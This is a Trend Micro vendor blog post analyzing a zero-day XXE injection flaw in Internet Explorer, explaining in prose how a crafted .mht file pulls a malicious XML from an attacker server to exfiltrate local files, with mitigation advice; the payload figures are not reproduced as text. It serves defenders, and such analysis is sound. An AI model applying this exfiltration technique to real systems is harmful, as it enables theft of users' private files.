Analyzing Zero-Day XML XXE Injection Vulnerability – Trend Micro

Business
Improve your risk posture with attack surface management
Security that enables business outcomes
Gain visibility and meet business needs with security
Connect with confidence from anywhere, on any device
Secure users and key operations throughout your environment
Move faster than your adversaries with powerful purpose-built XDR, cyber risk exposure management, and zero trust capabilities
Maximize effectiveness with proactive risk reduction and managed services
Understand your attack surface, assess your risk in real time, and adjust policies across network, workloads, and devices from a single console
Drive business value with measurable cybersecurity outcomes
See more, act faster
Evolve your security to mitigate threats quickly and effectively
Ensure code runs only as intended
Gain visibility and control with security designed for cloud environments
Protect patient data, devices, and networks while meeting regulations
Stop threats with easy-to-use solutions designed for your growing business
Bridge threat protection and cyber risk management
Stop breaches before they happen
Realistic phishing simulations and training campaigns to strengthen your first line of defense
Stop adversaries faster with a broader perspective and better context to hunt, detect, investigate, and respond to threats from a single platform
The most trusted cloud security platform for developers, security teams, and businesses
Cloud asset discovery, vulnerability prioritization, Cloud Security Posture Management, and Attack Surface Management all in one
Extend visibility to the cloud and streamline SOC investigations
Secure your data center, cloud, and containers without compromising performance by leveraging a cloud security platform with CNAPP capabilities
Simplify security for your cloud-native applications with advanced container image scanning, policy-based admission control, and container runtime protection
Protect application workflow and cloud storage against advanced threats
Defend the endpoint through every stage of an attack
Stop adversaries faster with a broader perspective and better context to hunt, detect, investigate, and respond to threats from a single platform
Optimized prevention, detection, and response for endpoints, servers, and cloud workloads
Expand the power of XDR with network detection and response
Stop adversaries faster with a broader perspective and better context to hunt, detect, investigate, and respond to threats from a single platform
Protect against known, unknown, and undisclosed vulnerabilities in your network
Redefine trust and secure digital transformation with continuous risk assessments
Stay ahead of phishing, BEC, ransomware and scams with AI-powered email security, stopping threats with speed, ease and accuracy.
See threats coming from miles away
End-to-end identity security from identity posture management to detection and response
Discover AI solutions designed to protect your enterprise, support compliance, and enable responsible innovation
Strengthen your defenses with the industry's first proactive cybersecurity AI – no blind spots, no surprises
The industry’s first proactive cybersecurity AI
Harness unparalleled breadth and depth of data, high-quality analysis, curation, and labeling to reveal meaningful, actionable insights
Secure your AI journey and eliminate vulnerabilities before attacks happen – so you can innovate with confidence
Shaping the future of cybersecurity through AI innovation, regulatory leadership, and trusted standards
Prevent, detect, respond and protect without compromising data sovereignty
Extend your team with trusted 24/7 cybersecurity experts to predict, prevent, and manage breaches.
Augment security teams with 24/7/365 managed detection, response, and support
Assess, understand, and mitigate cyber risk with strategic guidance
Augment threat detection with expertly managed detection and response (MDR) for email, endpoints, servers, cloud workloads, and networks
Our trusted experts are on call whether you're experiencing a breach or looking to proactively improve your IR plans
Stop breaches with the best response and detection technology on the market and reduce clients’ downtime and claim costs
Grow your business and protect your customers with the best-in-class complete, multilayered security
Stand out to customers with competency endorsements that showcase your expertise
Deliver proactive security services from a single, partner-centric security platform built for MSPs, MSSPs, and DFIR teams
We work with the best to help you optimize performance and value
Discover resources designed to accelerate your business’s growth and enhance your capabilities as a Trend Micro partner
Accelerate your learning with Trend Campus, an easy-to-use education platform that offers personalized technical guidance
Access collaborative services designed to help you showcase the value of Trend Vision One™ and grow your business
Locate a partner from whom you can purchase Trend Micro solutions
Real-world stories of how global customers use Trend to predict, prevent, detect, and respond to threats.
See how cyber resilience led to measurable impact, smarter defense, and sustained performance.
Meet the people behind the protection – our team, customers, and improved digital well-being.
Hear directly from our users. Their insights shape our solutions and drive continuous improvement.
See how Trend outperforms the competition
Crowdstrike provides effective cybersecurity through its cloud-native platform, but its pricing may stretch budgets, especially for organizations seeking cost-effective scalability through a true single platform
Microsoft offers a foundational layer of protection, yet it often requires supplemental solutions to fully address customers' security problems
Palo Alto Networks delivers advanced cybersecurity solutions, but navigating its comprehensive suite can be complex and unlocking all capabilities requires significant investment
Demo Series: Mastering Exposure Management
Proactively uncover and manage cyber risk >
New Threat Alert: Anubis Ransomware
Key takeaways for defenders >
High-Speed Threats: Cybersecurity in Motorsport
Inside the race to stay digitally secure >
Google Acquires Wiz: A New Era for Cloud-Native Security
Learn more >
Inside Vision One: Turning Threat Intel Into Protection
Learn more >
Content has been added to your Folio
Exploits & Vulnerabilities
An attacker can reportedly exploit this vulnerability to steal confidential information or exfiltrate local files from the victim’s machine.
By: Ranga Duraisamy, Kassiane Westell Read time:  ( words)
Save to Folio
Updated as of May 7, 2019, 6:30PM PDT to inlcude an updated TippingPoint MainlineDV filter/rule as well as clarify descriptions on opening a new duplicate tab and how the vulnerability is triggered manually.
A zero-day extensible markup language (XML) external entity (XXE) injection vulnerability in Microsoft Internet Explorer (IE) was recently disclosed by security researcher John Page. An attacker can reportedly exploit this vulnerability to steal confidential information or exfiltrate local files from the victim’s machine. Page tested the vulnerability in the latest version of IE (11) with current patches on Windows 7 and 10, and Windows Server 2012 R2 operating systems. We looked at its attack chain to better understand how the security flaw works and how it can be mitigated. XXE injection works by exploiting an XML parser with an improperly restricted XML external entity reference (CWE-611), which is used to access unauthorized content.
XXE injection also exploits misconfigured document type definition (CWE-827) used to define document types for markup languages like XML. For example, an attacker can use a malicious XML file with external entity reference that abuses the ‘file://’ protocol to access local files, or ‘http://’ to access files on web servers.
In the case of the vulnerability reported by Page, the security flaw is triggered when a specially crafted MIME HTML web archive (.mht) file is opened and the user interacts with the browser, with actions such as opening a new duplicate tab in IE (Ctrl+K) or printing a file (Ctrl+P). However, the user interaction can be simulated by JavaScript functions like window.print(). Once the user opens the malicious .mht file, the attacker would be able to exfiltrate files from the user’s system. Note that successfully exploiting this flaw relies heavily on social engineering. For instance, attackers have to lure the user into downloading a malicious .mht file and manually triggering the vulnerability (i.e., opening the file).
Page disclosed the vulnerability, and we shared our analysis to Microsoft, which released this official statement: “Internet Explorer alone does not permit this type of malicious behavior. An attacker must trick or convince a user into downloading a malicious document through a socially engineered scheme, for example a spam email attachment or phishing campaign that triggers a download. The file must then be opened with the browser. To guard against this scheme, practice safe computing habits online, such as avoid downloading and opening untrusted files from the Internet.”
Vulnerability impact
An attacker who successfully exploits this vulnerability could gain access to sensitive files on the user’s system. Successful exploitation could also provide reconnaissance information that can be used to execute more attacks or launch more payloads. For instance, it can divulge the client’s installed applications, network configuration, privileges, and details of antivirus protection to an attacker. The attacker could then use the obtained information to gain a foothold into the affected system’s network.
While XXE injections/attacks aren’t new, they could pose significant security risks. In fact, XXE attacks are listed among Open Web Application Security Project’s (OWASP) top security risks to applications and features in popular software or tools. The abuse of .mht files as an attack vector is also notable, as it’s also known to be abused by exploit kits and threats like information stealers.
Attack chain analysis
In order for the security flaw to be exploited, a malicious XML file has to be placed in the attacker’s hypertext transfer protocol (HTTP) server. This XML file should mention the specific files that need to be exfiltrated from the user’s system in the ENTITY tag, which represents a request or response in HTTP messages. In turn, the corresponding file needs to be referred as an external entity in the malicious MHTML file, which the users could manually execute on their machines.

Figure 1. A malicious XML file that specifies the files to extract from the user’s system
The attacker must convince the user to download the malicious MHTML file through external attack vectors, such as socially engineered spam email attachment or phishing. The email client must then open the malicious file with IE. Note that IE is the default application used to open MHTML files on all versions of Windows and so the user does not need to specify the application. As shown in Figure 3, the vulnerable IE client will send a GET request to the attacker’s server to retrieve the malicious XML file once the malicious MHTML file is opened.

Figure 2. Sample MHTML file that uses the XXE vulnerability in IE to download a malicious XML file from the attacker’s machine

Figure 3. Packet capture of first request sent from the client to the attacker’s server to get the malicious XML file
As can be seen from Figure 1, the malicious XML file contains details of files specified for exfiltration, along with the uniform resource identifier (URI) of the attacker-controlled server. The contents of the files that the attacker referenced in the malicious XML are sent back to the attacker’s server as per the URI path mentioned in the same XML file. This will then be displayed on the attacker’s end.
Figure 4: Packet capture of the second request sent from the client to the attacker’s server that sends the contents of the attacker’s target file
Trend Micro solutions
As of this writing, Microsoft has not released a fix for this vulnerability. Users should exercise caution when opening any file from an unknown sources. Successfully exploiting the vulnerability entails enticing users to open malicious files. Avoid clicking links or downloading and opening files from unsolicited sources. Ensure that the operating system and applications have the latest security updates (or use virtual patching for legacy systems). System administrators, developers, and programmers should also adopt best practices. OWASP, for instance, has a list of recommendations for preventing XXE issues.
The Trend Micro™ Deep Security™  and Vulnerability Protection solutions protect user systems from threats that may exploit this vulnerability via the following DPI rule:
Trend Micro™ TippingPoint™ customers are protected from this vulnerability via this MainlineDV filter:
Ranga Duraisamy
Vulnerability Researcher
Kassiane Westell
Vulnerability Researcher
Select a country / region
Experience our enterprise cybersecurity platform for free

source

Leave a Comment